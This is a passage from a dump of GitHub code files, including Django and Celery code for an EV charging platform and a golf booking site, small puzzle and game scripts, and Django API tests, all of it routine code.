当充电桩实际停止充电后须立即推送结果信息到市级平台e充网,从充电桩收到停止命\n 令到向市级平台e充网推送充电停止结果时间间隔控制在50秒内\n :return:\n \"\"\"\n Data = {\n \"StartChargeSeq\": start_charge_seq,\n \"ConnectorID\": connector_id,\n }\n # Ret = 0\n # Msg = \"\"\n try:\n sleep(5)\n order = Order.objects.get(start_charge_seq=start_charge_seq)\n\n Data[\"StartChargeSeqStat\"] = get_order_status(order.charg_status_id)\n\n except Order.DoesNotExist as ex:\n Data[\"StartChargeSeqStat\"] = 5\n # Msg = \"Order Not Exists\"\n\n # encrypt_data = data_encode(**Data) # 数据加密\n # # 数据签名, 用Ret+Msg+Data生成返回签名\n # sig_data = \"{0}{1}{2}\".format(str(Ret), Msg, encrypt_data)\n # ret_sig = get_hmac_md5(settings.SIGSECRET, sig_data)\n # result = {\n # \"Ret\": Ret,\n # \"Msg\": Msg,\n # \"Data\": encrypt_data,\n # \"Sig\": ret_sig,\n # }\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n status = echarge.notification_stop_charge_result(**Data)\n if status > 0:\n print(\"推送停止充电结果失败!\", status)\n else:\n print(\"推送停止充电结果成功!\", status)\n\n connector_status = echarge.notification_station_status(connector_id, 0) # 设置为空闲状态\n if status > 0:\n print(\"设备状态变化推送失败!\", connector_status)\n else:\n print(\"设备状态变化推送成功!\", connector_status)\n\n\n@shared_task\ndef notification_charge_order_info_for_bonus():\n \"\"\"\n 推送充电订单信息(运营考核奖励)\n 使用要求:自充电桩停止充电并生成订单后,订单须在150秒内上报到市级平台e充网,如上报失败\n 须按照以下频率推送订单信息(150/300/…./1800/3600/….,单位秒)\n \"\"\"\n orders = Order.objects.filter(Q(report_result__isnull=True) | Q(report_result__gt=0), start_charge_seq__isnull=False, status=2)\n result ={}\n # Ret = 0\n # Msg = \"\"\n for order in orders:\n if order.begin_time is None or order.end_time is None:\n continue\n\n if order.report_time is not None:\n if (datetime.now() - order.report_time).seconds < 145:\n continue\n\n try:\n gun = ChargingGun.objects.get(charg_pile=order.charg_pile, gun_num=order.gun_num)\n except ChargingGun.DoesNotExist as ex:\n gun = None\n\n ConnectorID = '{}{}'.format(order.charg_pile.pile_sn, order.gun_num)\n result[\"StartChargeSeq\"] = order.start_charge_seq\n result[\"ConnectorID\"] = ConnectorID\n result[\"StartTime\"] = order.begin_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n result[\"EndTime\"] = order.end_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n result[\"ChargeModel\"] = 0\n result[\"TotalPower\"] = str(order.get_total_reading())\n result[\"TotalMoney\"] = str(order.consum_money)\n result[\"UserName\"] = order.name\n result[\"StationID\"] = str(order.charg_pile.station.id)\n result[\"EquipmentID\"] = order.charg_pile.pile_sn\n result[\"ConnectorPower\"] = gun.power if gun is not None else 0\n result[\"ChargeLast\"] = order.total_seconds()\n result[\"MeterValueStart\"] = str(order.begin_reading)\n result[\"MeterValueEnd\"] = str(order.end_reading)\n if order.charg_status_id == 91:\n result[\"StopReason\"] = 0 # 用户手动停止充电\n elif order.charg_status_id in [95, 96]:\n result[\"StopReason\"] = 3 # 充电机设备故障\n elif order.charg_status_id in [98, 92]:\n result[\"StopReason\"] = 4 # 连接器断开\n elif order.charg_status_id in [93, 94, 97]:\n result[\"StopReason\"] = 1 # 客户归属地运营商平台停止充\n\n # encrypt_data = data_encode(**result) # 数据加密\n # # 数据签名, 用Ret+Msg+Data生成返回签名\n # sig_data = \"{0}{1}{2}\".format(str(Ret), Msg, encrypt_data)\n # ret_sig = get_hmac_md5(settings.SIGSECRET, sig_data)\n # result = {\n # \"Ret\": Ret,\n # \"Msg\": Msg,\n # \"Data\": encrypt_data,\n # \"Sig\": ret_sig,\n # }\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n ret_data = echarge.notification_charge_order_info_for_bonus(**result)\n\n if \"Ret\" in ret_data and ret_data[\"Ret\"] == 0:\n # 解密\n ret_crypt_data = ret_data[\"Data\"]\n ret_decrypt_data = data_decode(ret_crypt_data)\n # 获取到code值\n dict_decrpt_data = json.loads(ret_decrypt_data)\n print(dict_decrpt_data[\"StartChargeSeq\"])\n ConfirmResult = dict_decrpt_data[\"ConfirmResult\"]\n else:\n ConfirmResult = 99\n\n order.report_result = ConfirmResult\n order.report_time = datetime.now()\n order.save()\n if ConfirmResult > 0:\n print(\"推送充电订单信息失败!\", ConfirmResult)\n else:\n print(\"推送充电订单信息成功!\", ConfirmResult)\n\n\n# 定时任务\n@shared_task\ndef notification_connector_status():\n \"\"\"定时推送设备接口状态\"\"\"\n connectors = ConnectorInfo.objects.all()\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n for connector in connectors:\n status = echarge.notification_station_status(connector.ConnectorID, connector.Status)\n if status > 0:\n print(\"设备状态变化推送失败:{},{}\".format(connector.ConnectorID, status))\n else:\n print(\"设备状态变化推送成功:{},{}\".format(connector.ConnectorID, status))\n\n\n# 定时任务\n@shared_task\ndef check_charge_orders():\n \"\"\"\n 接口名称:check_charge_orders\n 使用要求:每天0点到3点之间推送前一天市级平台e充网启动的所有订单信息\n 1、是否是经过上报的订单\n 2、开始时间还是结束时间(跨天问题)\n \"\"\"\n prev_date = datetime.now().date() - timedelta(days=1)\n print(\"当前时间:\", prev_date)\n order_totals = Order.objects.filter(end_time__date=prev_date, start_charge_seq__isnull=False, status=2, charg_pile__is_subsidy=1)\\\n .aggregate(\n start_time=Min(\"end_time\"), end_time=Max(\"end_time\"), order_count=Count(\"out_trade_no\"),\n total_power=Sum(F(\"end_reading\") - F(\"begin_reading\")), total_money=Sum(\"consum_money\")\n )\n print(order_totals)\n check_orders = {}\n check_order_seq = '{0}{1}{2}'.format(settings.OPERATORID, datetime.now().strftime('%Y%m%d%H%M%S'), random.randint(10000, 100000))\n check_orders[\"CheckOrderSeq\"] = check_order_seq\n check_orders[\"StartTime\"] = order_totals[\"start_time\"].strftime(\"%Y-%m-%d %H:%M:%S\")\n check_orders[\"EndTime\"] = order_totals[\"end_time\"].strftime(\"%Y-%m-%d %H:%M:%S\")\n check_orders[\"OrderCount\"] = order_totals[\"order_count\"]\n check_orders[\"TotalOrderPower\"] = float(order_totals[\"total_power\"])\n check_orders[\"TotalOrderMoney\"] = float(order_totals[\"total_money\"])\n\n orders = Order.objects.filter(end_time__date=prev_date, start_charge_seq__isnull=False,\n status=2, charg_pile__is_subsidy=1)\n charge_orders = []\n for order in orders:\n d_order = {}\n d_order[\"StartChargeSeq\"] = order.start_charge_seq\n d_order[\"TotalPower\"] = float(order.get_total_reading())\n d_order[\"TotalMoney\"] = float(order.consum_money)\n charge_orders.append(d_order)\n\n check_orders[\"ChargeOrders\"] = charge_orders\n print(json.dumps(check_orders))\n\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n ret_data = echarge.check_charge_orders(**check_orders)\n if \"Ret\" in ret_data and ret_data[\"Ret\"] == 0:\n # 解密\n ret_crypt_data = ret_data[\"Data\"]\n ret_decrypt_data = data_decode(ret_crypt_data)\n # 获取到code值\n dict_decrpt_data = json.loads(ret_decrypt_data)\n check_order = {\n \"CheckOrderSeq\": dict_decrpt_data[\"CheckOrderSeq\"],\n \"StartTime\": datetime.strptime(dict_decrpt_data[\"StartTime\"], '%Y-%m-%d %H:%M:%S'),\n \"EndTime\": datetime.strptime(dict_decrpt_data[\"EndTime\"], '%Y-%m-%d %H:%M:%S'),\n \"TotalDisputeOrder\": dict_decrpt_data[\"TotalDisputeOrder\"],\n \"TotalDisputePower\": dict_decrpt_data[\"TotalDisputePower\"],\n \"TotalDisputeMoney\": dict_decrpt_data[\"TotalDisputeMoney\"],\n }\n CheckChargeOrder.objects.create(**check_order)\n DisputeOrders = dict_decrpt_data[\"DisputeOrders\"]\n for disOrder in DisputeOrders:\n DisputeOrder.objects.create(**disOrder)\n else:\n print(ret_data[\"Msg\"])\n\n\n","repo_name":"malx927/chargingstation","sub_path":"stationmanager/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":13714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72220182487","text":"\"\"\"\nBooking App - form\n---------------------\nForm for booking app\n\n\"\"\"\n# Imports\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nfrom django import forms\nfrom django.forms.widgets import CheckboxSelectMultiple\nfrom .models import Booking, TeeTime\nfrom django.contrib import messages\nfrom datetime import date, datetime, time\nfrom django.utils import timezone\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\nclass TeeTimeForm(forms.Form):\n\n \"\"\"\n Form that enables users to enter their booking criteria and return\n available teetimes\n \"\"\"\n\n def __init__(self, *args, user=None, **kwargs):\n \"\"\"\n Initialize form with optional user data. Set 'user' attribute and\n field initial values.\n \"\"\"\n self.user = user\n super().__init__(*args, **kwargs)\n self.fields['date'].initial = date.today()\n self.fields['players'].initial = 1\n\n date = forms.DateField(widget=forms.DateInput(\n attrs={'class': 'form-control', 'type': 'date',\n 'min': datetime.today().date()}))\n start_time = forms.TimeField(widget=forms.TimeInput(\n attrs={'class': 'form-control', 'type': 'time', }))\n end_time = forms.TimeField(widget=forms.TimeInput(\n attrs={'class': 'form-control', 'type': 'time', }))\n players = forms.IntegerField(widget=forms.NumberInput(\n attrs={'class': 'form-control', 'min': '1', 'max': '4'}))\n\n def clean(self):\n \"\"\"\n Clean and validate form data. Check for existing bookings,\n time constraints, and errors.\n \"\"\"\n cleaned_data = super().clean()\n date = cleaned_data.get('date')\n start_time = cleaned_data.get('start_time')\n end_time = cleaned_data.get('end_time')\n today = date.today()\n time_now = datetime.now().time()\n\n if date:\n # Query for any existing bookings for the same date and user\n existing_booking = Booking.objects.filter(\n user_name=self.user,\n booking_datetime__tee_datetime__date=date\n ).first()\n\n if existing_booking:\n self.add_error(\n None, f\"\"\"You have already booked a tee time on {date}.\n You are only permitted to make one booking per day.\"\"\")\n\n if date == today and start_time < time_now:\n formatted_start_time = start_time.strftime('%H:%M')\n formatted_time_now = time_now.strftime('%H:%M')\n self.add_error(\n None, f\"\"\"You're selected start time {formatted_start_time} is\n in the past please try again and select a start time\n after {formatted_time_now}.\"\"\")\n\n if start_time and end_time and start_time >= end_time:\n self.add_error(\n 'end_time', 'End time must be later than start time.')\n\n def get_available_tee_times(self):\n \"\"\"\n Get available tee times based on cleaned form data.\n Query and filter TeeTime objects.\n \"\"\"\n\n date = self.cleaned_data.get('date')\n start_time = self.cleaned_data.get('start_time')\n end_time = self.cleaned_data.get('end_time')\n players = self.cleaned_data.get('players')\n\n tee_times = TeeTime.objects.filter(\n tee_datetime__date=date,\n tee_datetime__time__gte=start_time,\n tee_datetime__time__lte=end_time,\n max_players__gte=players,\n available=True\n ).order_by('tee_datetime')\n\n for tee_time in tee_times:\n tee_time.num_booked_players = tee_time.available_slots()\n\n return tee_times\n","repo_name":"Oran-123/Hook-n-Slice-Golf","sub_path":"booking/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13402417259","text":"# cook your dish here\nfor _ in range(int(input())) :\n N = int(input())\n nums = list(map(int, input().split()))\n visited = {0:0, 1:0}\n for i in nums :\n if i%2 :\n visited[1] += 1\n else :\n visited[0] += 1\n print(visited[0]*visited[1])","repo_name":"Optider/CodeChef","sub_path":"UWCOI 2020 (United World College Olympiad in Informatics)/Button Pairs UWCOI20B.py","file_name":"Button Pairs UWCOI20B.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31918036963","text":"#Omar Shahwan 10/28/23 WORDLE\r\n#The following project codes a Wordle game in which the user tries to find what the hidden five-letter word is within six guesses.\r\n#User is prompted to input a word, given 'Y' for letters in the word in a different place, 'G' for letters in the right place, and '_' for incorrect.\r\n\r\nimport random\r\n\r\nwords = [\"ABOUT\",\"AUDIO\",\"BAKED\",\"BINGE\",\"CLOUD\",\"COUCH\",\"FLARE\",\"FLOAT\",\"SNIPE\",\"STARE\"]\r\nanswer = random.choice(words)\r\n\r\ndef get_clue(ans, guess):\r\n clue = \"\"\r\n for idx, letter in enumerate(guess):\r\n if letter == ans[idx]:\r\n clue += \"G\"\r\n elif letter in ans:\r\n clue += \"Y\"\r\n else:\r\n clue += \"_\"\r\n return clue\r\n \r\nfor x in range(1,7):\r\n guess = input(\"Word? \")[0:5]\r\n guess = guess.upper()\r\n print (get_clue(answer, guess), x)\r\n if answer == guess:\r\n break\r\n","repo_name":"OmarShahwanGitHub/Wordle_1","sub_path":"Wordle.py","file_name":"Wordle.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26693777291","text":"class FlightData:\n #This class is responsible for structuring the flight data.\n def __init__(self, price, dep_iata, dest_iata, dest_city, dep_city, dep_date, ret_date, stop_overs=0,\n via_city=\"\"):\n self.price = price\n self.dep_iata = dep_iata\n self.dest_iata = dest_iata\n self.dep_city = dep_city\n self.dest_city = dest_city\n self.dep_date = dep_date\n self.ret_date = ret_date\n self.stop_overs = stop_overs\n self.via_city = via_city\n\n # def return_flight_data_dictionary(self):\n # return self.flight_data_dictionary\n # price, dep_city, dep_iata, dest_city, dest_iata, dep_date, return_date\n\n\n\n\n","repo_name":"nthnelliott857/100DaysOfCodeV2","sub_path":"Day39/flight-deals-start/flight_data.py","file_name":"flight_data.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43179689679","text":"# coding: utf-8\nfrom douyu.chat.room import ChatRoom\nimport time,os\nimport sys,conf\n\nf = open(str(conf.room_num)+'.txt','a+')\ndef on_chat_message(msg):\n\tos.environ['TZ']='Asia/Shanghai'\n\t#time.tzset()\n\tmsg_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\tuser = msg.attr('nn')\n\ttxt = msg.attr('txt')\n\tlevel = msg.attr('level')\n\td = \"[%s] [lv%s %s]:%s\\n\" % (msg_time,level,user,txt)\n\tf.write(d)\n\ndef run():\n\troom = ChatRoom(str(conf.room_num))\n\troom.on('chatmsg', on_chat_message)\n\troom.knock()\n\nif __name__ == '__main__':\n\trun()\n","repo_name":"Nan3r/douyutv","sub_path":"douyu.py","file_name":"douyu.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"8096166220","text":"import argparse\nimport aspell\n\nfrom nltk.stem.isri import ISRIStemmer\n\nar_spell = aspell.Speller(('dict-dir', './ar_ayspell_dict/'),\n ('lang', 'ar'),\n ('encoding', 'utf-8'))\n\n\ndef get_root_word(arabic_word):\n arabic_stemmer = ISRIStemmer()\n arabic_root = arabic_stemmer.stem(arabic_word)\n return arabic_root\n\n\ndef separate_waw(text):\n words = line.split()\n sentence = ''\n for word in words:\n if word.startswith('و'):\n root = get_root_word(word)\n if root.startswith('و'):\n sentence += word + ' '\n else:\n sentence += 'و ' + word[1:] + ' '\n print('{} changed to {}'.format(word, 'و ' + word[1:]))\n else:\n sentence += word + ' '\n return sentence\n\n\nparser = argparse.ArgumentParser(description='separate the '\n 'conjunction waw from '\n 'Arabic words')\n\nparser.add_argument('-i', '--infile', type=argparse.FileType(mode='r', encoding='utf-8'),\n help='input file.', required=True)\nparser.add_argument('-o', '--outfile', type=argparse.FileType(mode='w', encoding='utf-8'),\n help='out file.', required=True)\n\nif __name__ == '__main__':\n args = parser.parse_args()\n lines = args.infile.readlines()\n clean_lines = list()\n for line in lines:\n clean_lines.append(separate_waw(line))\n args.outfile.write('\\n'.join(clean_lines))\n","repo_name":"motazsaad/split-waw-arabic","sub_path":"process_waw_rooting.py","file_name":"process_waw_rooting.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"17484852811","text":"def acha_menor(lista):\n print(lista)\n menor = lista[0]\n local_menor = 0\n for i in range(len(lista)):\n #print(f\"Agora vou testar se lista[{i}], {lista[i]} > {maior}\")\n if lista[i] 9:\n return node\n else:\n return None\n return (\n find_splitting_node(node.left)\n or find_splitting_node(node.right)\n )\n\ndef reduce(tree):\n while 1:\n left, exploding_node, right = find_exploding_node(tree)\n if exploding_node:\n if left:\n left.value += exploding_node.left.value\n if right:\n right.value += exploding_node.right.value\n exploding_node.left = None\n exploding_node.right = None\n exploding_node.value = 0\n continue\n\n splitting_node = find_splitting_node(tree)\n if splitting_node:\n left = Node()\n right = Node()\n\n left.value = int(splitting_node.value / 2)\n right.value = int(0.5 + splitting_node.value / 2)\n\n splitting_node.value = None\n splitting_node.left = left\n splitting_node.right = right\n continue\n break\n \n return tree\n\ndef get_magnitude(node):\n if node.value is not None:\n return node.value\n return 3 * get_magnitude(node.left) + 2 * get_magnitude(node.right)\n\n\nnums = [parse_num(line) for line in data.splitlines()] # snailfish numbers as lists\ntrees = [make_tree(num) for num in nums] # snailfish numbers as trees\n\n\nfull_tree = trees[0]\nfor tree in trees[1:]:\n full_tree = add(full_tree, tree)\n full_tree = reduce(full_tree)\nprint(\"Part 1:\", get_magnitude(full_tree)) # 3305\n\n\nlargest_magnitude = 0\nfor num1 in nums:\n for num2 in nums:\n if num1 is num2:\n continue\n t1 = make_tree(num1)\n t2 = make_tree(num2)\n magnitude = get_magnitude(reduce(add(t1, t2)))\n largest_magnitude = max(largest_magnitude, magnitude)\nprint(\"Part 2:\", largest_magnitude) # 4563\n","repo_name":"yoggi-yalla/aoc2021","sub_path":"18/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74665313048","text":"#coding:utf-8\npath = 'D://李响//key_word//shiyan//sim//sim_xianguan_xiugai.txt'\npath_zl ='D://李响//key_word//shiyan//sim//sim_xianguan_zl.txt'\n\nsim_zl = open(path_zl,'w',encoding='utf-8')\nwith open(path,'r',encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n if(len(line) != 0):\n line = line.replace(\" \",\"\t\")\n sim_zl.write(line)\n sim_zl.write('\\n')\n\n\n\n\n\n\n\n","repo_name":"LawLietzh/workspacePy","sub_path":"py/gongZuo/sim_zhengli/sim_xianguan.py","file_name":"sim_xianguan.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37712587482","text":"import numpy as np\nfrom typing import List\n\n\nx_directions = [-1, 0, 1, 0]\ny_directions = [0, 1, 0, -1]\n\n\ndef is_valid(visited_array: np.ndarray, node_x: int, node_y: int) -> bool:\n if 0 <= node_x < visited_array.shape[0] and \\\n 0 <= node_y < visited_array.shape[1] and \\\n visited_array[node_x, node_y] == False:\n return True\n else:\n return False\n\n\ndef find_neighbors(input_array: np.ndarray, visited_array: np.ndarray, node_x: int, node_y: int) -> np.ndarray:\n for i, j in zip(x_directions, y_directions):\n neighbor_x, neighbor_y = node_x+i, node_y+j\n valid = is_valid(visited_array, neighbor_x, neighbor_y)\n if not valid:\n continue\n visited_array[neighbor_x, neighbor_y] = True\n if input_array[neighbor_x, neighbor_y] == 1:\n visited_array = find_neighbors(input_array, visited_array, neighbor_x, neighbor_y)\n return visited_array\n\n\ndef find_islands(input_array: List[List[int]]) -> int:\n input_array = np.array(input_array)\n visited_array = np.zeros(input_array.shape, dtype=bool)\n candidates = np.array(np.where(input_array == 1)).T\n n_islands = 0\n for candidate in candidates:\n candidate_x, candidate_y = candidate\n valid = is_valid(visited_array, candidate_x, candidate_y)\n if not valid:\n continue\n visited_array = find_neighbors(input_array, visited_array, candidate_x, candidate_y)\n n_islands += 1\n return n_islands\n","repo_name":"mmezyk/coding-exercises","sub_path":"python-algorithms-counting-islands/island_finder.py","file_name":"island_finder.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2174545651","text":"from django.test import TestCase\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\nfrom rest_framework.test import APITestCase\nfrom script.models.enums import DayType, POI, AggregationLevel\nfrom script.models.data import County\nfrom script.models.config import LoadControllerConfig, LoadForecastConfig, LoadProfileConfig, GasConsumptionConfig, NetPresentValueConfig, CostBenefitConfig, EmissionConfig\nfrom script.models.algorithms import LoadController, LoadForecast, LoadProfile, GasConsumption, CostBenefit, NetPresentValue, Emission, LoadForecastConfig\nfrom script.tests.utils import create_load_controller_config, create_load_forecast_config, create_load_profile_config, create_cost_benefit_config, create_emission_config, create_gas_consumption_config, create_net_present_value_config\nfrom script.tests.utils import create_county, create_load_controller, create_load_forecast, create_load_profile, create_gas_consumption, create_cost_benefit, create_net_present_value, create_emission\n\nfrom script.tests.test_data import CountyTests\nfrom script.tests.test_config import LoadControllerConfigTests, LoadForecastConfigTests, LoadProfileConfigTests, GasConsumptionConfigTests, NetPresentValueConfigTests, CostBenefitConfigTests, EmissionConfigTests\n\nimport json\nimport copy\n\nclass LoadControllerTests(APITestCase):\n\n uncontrolled_load = [\n {\n 'time': '05:30',\n 'load': '134'\n },\n {\n 'time': '05:45',\n 'load': '323'\n },\n {\n 'time': '06:00',\n 'load': '413'\n }\n ]\n controlled_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '320'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n\n def test_create_load_controller(self):\n \"\"\"Ensure we can create a new load controller object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_controller_config(CountyTests.county_name,\n LoadControllerConfigTests.rate_energy_peak,\n LoadControllerConfigTests.rate_energy_partpeak,\n LoadControllerConfigTests.rate_energy_offpeak,\n LoadControllerConfigTests.rate_demand_peak,\n LoadControllerConfigTests.rate_demand_partpeak,\n LoadControllerConfigTests.rate_demand_overall)\n config = LoadControllerConfig.objects.get()\n response = create_load_controller(config,\n json.dumps(self.uncontrolled_load),\n json.dumps(self.controlled_load))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(LoadController.objects.count(), 1)\n obj = LoadController.objects.get()\n self.assertEqual(obj.config.county.name, CountyTests.county_name)\n self.assertEqual(json.loads(obj.uncontrolled_load), self.uncontrolled_load)\n self.assertEqual(json.loads(obj.controlled_load), self.controlled_load)\n\n def test_create_conflict(self):\n \"\"\"Ensure we cannot create two load controllers with the same config.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_controller_config(CountyTests.county_name,\n LoadControllerConfigTests.rate_energy_peak,\n LoadControllerConfigTests.rate_energy_partpeak,\n LoadControllerConfigTests.rate_energy_offpeak,\n LoadControllerConfigTests.rate_demand_peak,\n LoadControllerConfigTests.rate_demand_partpeak,\n LoadControllerConfigTests.rate_demand_overall)\n config = LoadControllerConfig.objects.get()\n response = create_load_controller(config,\n json.dumps(self.uncontrolled_load),\n json.dumps(self.controlled_load))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n response = create_load_controller(config,\n json.dumps(self.uncontrolled_load),\n json.dumps(self.controlled_load))\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_filter_config(self):\n \"\"\"Ensure we can filter load controllers by fields: config.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_county('Palo Alto',\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_controller_config(CountyTests.county_name,\n LoadControllerConfigTests.rate_energy_peak,\n LoadControllerConfigTests.rate_energy_partpeak,\n LoadControllerConfigTests.rate_energy_offpeak,\n LoadControllerConfigTests.rate_demand_peak,\n LoadControllerConfigTests.rate_demand_partpeak,\n LoadControllerConfigTests.rate_demand_overall)\n _ = create_load_controller_config('Palo Alto',\n LoadControllerConfigTests.rate_energy_peak,\n LoadControllerConfigTests.rate_energy_partpeak,\n LoadControllerConfigTests.rate_energy_offpeak,\n LoadControllerConfigTests.rate_demand_peak,\n LoadControllerConfigTests.rate_demand_partpeak,\n LoadControllerConfigTests.rate_demand_overall)\n county1 = County.objects.get(pk=CountyTests.county_name)\n config1 = LoadControllerConfig.objects.filter(county=county1)[0]\n response = create_load_controller(config1,\n json.dumps(self.uncontrolled_load),\n json.dumps(self.controlled_load))\n county2 = County.objects.get(pk='Palo Alto')\n config2 = LoadControllerConfig.objects.filter(county=county2)[0]\n new_controlled_load = copy.deepcopy(self.controlled_load)\n new_controlled_load[0]['load'] = '110'\n response = create_load_controller(config2,\n json.dumps(self.uncontrolled_load),\n json.dumps(new_controlled_load))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n url = reverse('algorithm/load_controller-list')\n data = {\n 'config': config1.id\n }\n response = self.client.get(url, data)\n obj = json.loads(response.content)[0]\n config = LoadControllerConfig.objects.get(id=obj['config'])\n self.assertEqual(config.county.name, CountyTests.county_name)\n self.assertEqual(json.loads(obj['controlled_load']), self.controlled_load)\n\n\nclass LoadForecastTests(APITestCase):\n\n residential_l1_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '320'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n residential_l2_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '3230'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n residential_mud_load = [\n {\n 'time': '05:30',\n 'load': '1303'\n },\n {\n 'time': '05:45',\n 'load': '320'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n work_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '3220'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n fast_load = [\n {\n 'time': '05:30',\n 'load': '130'\n },\n {\n 'time': '05:45',\n 'load': '3120'\n },\n {\n 'time': '06:00',\n 'load': '410'\n }\n ]\n public_l2_load = [\n {\n 'time': '05:30',\n 'load': '1330'\n },\n {\n 'time': '05:45',\n 'load': '3210'\n },\n {\n 'time': '06:00',\n 'load': '4110'\n }\n ]\n total_load = [\n {\n 'time': '05:30',\n 'load': '1130'\n },\n {\n 'time': '05:45',\n 'load': '320'\n },\n {\n 'time': '06:00',\n 'load': '4120'\n }\n ]\n\n def test_create_load_forecast(self):\n \"\"\"Ensure we can create a new EV load forecast object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n config = LoadForecastConfig.objects.get()\n response = create_load_forecast(config,\n json.dumps(self.residential_l1_load),\n json.dumps(self.residential_l2_load),\n json.dumps(self.residential_mud_load),\n json.dumps(self.work_load),\n json.dumps(self.fast_load),\n json.dumps(self.public_l2_load),\n json.dumps(self.total_load))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(LoadForecast.objects.count(), 1)\n obj = LoadForecast.objects.get()\n self.assertEqual(obj.config.config_name, LoadForecastConfigTests.config_name)\n self.assertEqual(obj.config.aggregation_level, LoadForecastConfigTests.aggregation_level.name)\n self.assertEqual(json.loads(obj.residential_l1_load), self.residential_l1_load)\n self.assertEqual(json.loads(obj.total_load), self.total_load)\n\n\nclass LoadProfileTests(APITestCase):\n loads = [i * 2 % 24 + 1 for i in range(24)]\n\n def test_create_load_profile(self):\n \"\"\"Ensure we can create a new load profile object.\"\"\"\n _ = create_county(CountyTests.county_name,\n CountyTests.total_session,\n CountyTests.total_energy,\n CountyTests.peak_energy)\n _ = create_load_forecast_config(LoadForecastConfigTests.config_name,\n LoadForecastConfigTests.aggregation_level,\n LoadForecastConfigTests.num_evs,\n LoadForecastConfigTests.choice,\n LoadForecastConfigTests.fast_percent,\n LoadForecastConfigTests.work_percent,\n LoadForecastConfigTests.res_percent,\n LoadForecastConfigTests.l1_percent,\n LoadForecastConfigTests.public_l2_percent)\n lf_config = LoadForecastConfig.objects.get()\n _ = create_load_profile_config(lf_config,\n LoadProfileConfigTests.poi,\n LoadProfileConfigTests.year,\n LoadProfileConfigTests.day_type)\n config = LoadProfileConfig.objects.get()\n response = create_load_profile(config, json.dumps(self.loads))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(LoadProfile.objects.count(), 1)\n obj = LoadProfile.objects.get()\n self.assertEqual(obj.config.lf_config.config_name, LoadForecastConfigTests.config_name)\n self.assertEqual(obj.config.poi, LoadProfileConfigTests.poi.name)\n self.assertEqual(json.loads(obj.loads), self.loads)\n\n\nclass 